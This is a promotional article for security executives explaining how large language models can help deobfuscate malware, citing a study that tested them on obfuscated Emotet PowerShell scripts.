How LLMs are changing the way we analyze malware

Large language models (LLMs) transform AI capabilities in language processing

One of the most advanced developments driving modern tech is the rise of large language models, or LLMs, like GPT and BERT. That means they can generate responses, translate languages, summarize complex documents, and answer nuanced questions. They learn patterns and adapt based on billions of real-world examples.

Behind this leap is access to massive datasets and a big jump in processing power. Graphics processing units (GPUs) and specialized chips like TPUs accelerated how fast we can train and scale these models. As a result, we can build systems that understand human language and continue to improve over time as they are exposed to more data. That performance shows up in tangible business applications across sectors, including customer support, content creation, legal research, and code generation.

It’s worth noting: this shift didn’t happen overnight. Years of foundational research converged with market-ready infrastructure and easy-to-use development tools. What used to sit behind research papers is now finding its way into business systems, helping companies automate intelligently, scale productivity, and make better decisions, without requiring a language expert on every team.

Modern malware obfuscation necessitates advanced deobfuscation techniques

Today’s malware is adaptive, layered, and deliberately hard to track. Obfuscation has become a default strategy for attackers. Code is packed, variables are replaced with random labels, dead code is injected to throw off analysts, and domain generation algorithms are used to hide connections with remote control servers. These attackers are iterating, evolving their methods in a consistent and deliberate way.

This sophistication breaks traditional security models. Static detection methods that once worked, such as signature-based systems or preset rule engines, are now quickly outdated when faced with just small changes to the malware’s codebase. Rule definitions like Yara, or tools like CyberChef that depend on predictable patterns, break down once the code is altered even slightly. What was detectable last week becomes invisible today.

Reverse engineering this kind of malware is no small challenge. Analysts usually need to convert machine code into something readable just to begin their investigation. Often, they’re digging through layers of noise to find just a few lines of malicious instructions. Even when tools like IDA Pro or Ghidra help, it still relies too heavily on manual analysis. And just when patterns are identified, malware authors push a new version, sidestepping rules and filters all over again.

For executives responsible for risk, this should underscore a simple fact: static defenses aren’t enough when malware is designed to avoid precisely those defenses. Rapid iteration from attackers means your security team must have tools that adapt just as fast. Investing in capabilities that evolve in real time, especially those powered by AI or machine learning, is the only way to keep up.

Malware campaigns now routinely use domain generation algorithms to cloak C2 infrastructure, while static detection patterns like Yara and automated scripts from CyberChef are easily circumvented. These tactics make it clear: attackers understand the gaps in today’s defensive tools and are optimizing around them. Organizations can’t afford to be reactionary, they have to anticipate and evolve.

LLMs offer a promising solution for automating malware deobfuscation

Large Language Models are built to process and understand complex patterns in language and code. That’s not limited to human language, it includes programming languages, scripting environments, and obfuscated logic. This makes them a logical candidate for malware deobfuscation, where traditional tools struggle to adapt to changes in structure, naming, or syntax.

LLMs do more than just read code. They interpret it. When given an obfuscated script, or one packed with misleading variables, dead code, or noise, they can isolate the actual logic, identify suspicious parts, and make that code comprehensible again. They don’t rely on fixed rules or static mapping like traditional deobfuscators. Instead, they learn from examples and apply context. They adapt, even when the malware’s format changes.

This allows threat analysts to identify key threat indicators faster, like command-and-control (C2) addresses, loader behavior, or script-based payload staging. Extraction of Indicators of Compromise (IOCs) becomes less dependent on deep manual analysis or purpose-built tools that need constant rule updates. LLMs help close the gap between detection and action, making it possible to scale threat intelligence across a wider set of attack vectors and variants.

For security leaders, LLMs reduce time-to-insight, surface hidden threats, and add a level of adaptability that rule-based systems simply don’t offer. And because they integrate with platforms like Ida and Ghidra, they fit into existing reverse engineering workflows without forcing teams to rebuild their tooling.

Empirical validation of LLMs in deobfuscating real-world malware

Theoretical strengths are important, but what matters most is performance in the real world. That’s exactly what the recent study on LLMs and malware deobfuscation set out to test, how these models perform when exposed to actual malicious code. The approach focused on PowerShell scripts, which are short, manageable, and common in malware payloads, making them a good match for LLM input constraints and capabilities.

The dataset centered on Emotet, a malware strain previously identified by Europol as “the most dangerous malware.” It’s known for its use of obfuscation, polymorphism, and rapid chaining of components. Using Emotet’s PowerShell scripts as the test case provided an authentic, high-stakes environment for evaluating model performance. The study analyzed how well LLMs could parse, clean, and summarize these scripts to extract actionable threat intelligence.

The results were solid, even without task-specific fine-tuning. LLMs successfully deobfuscated complex scripts and extracted critical indicators, suggesting strong generalization from pretraining. That means they can be deployed with minimal overhead to real-world threat environments and still deliver value. This reduces dependency on constant rule reengineering or narrow tools that break as soon as attackers iterate.

For security strategy, this marks a shift. It’s about automating workflows that previously needed specialized analysts. When LLMs are integrated into the threat analysis pipeline, they act as force multipliers: speeding up investigations, reducing analyst fatigue, and increasing detection fidelity. They help teams move faster without compromising detail or accuracy.

Main highlights

LLMs are redefining language and code comprehension: Large Language Models like GPT and BERT have moved beyond basic NLP to handle complex code and logic, enabling practical, scalable automation in areas like translation, customer interaction, and now, threat analysis.
Modern malware outpaces static security tools: Malware authors rapidly evolve obfuscation tactics like variable randomization and domain generation, rendering rule-based detection methods obsolete. Leaders should invest in adaptable, AI-driven threat detection to stay ahead.
LLMs unlock scalable, automated malware deobfuscation: Unlike static tools, LLMs can interpret obfuscated scripts and extract threat identifiers from indecipherable payloads. Security teams should integrate LLMs to reduce manual overhead and boost investigation speed.
Real-world tests prove LLMs are threat-ready: LLMs performed effectively against live Emotet malware data without custom training, demonstrating immediate value in real-world application. Executives should consider LLM integration to strengthen cyber threat intelligence pipelines at scale.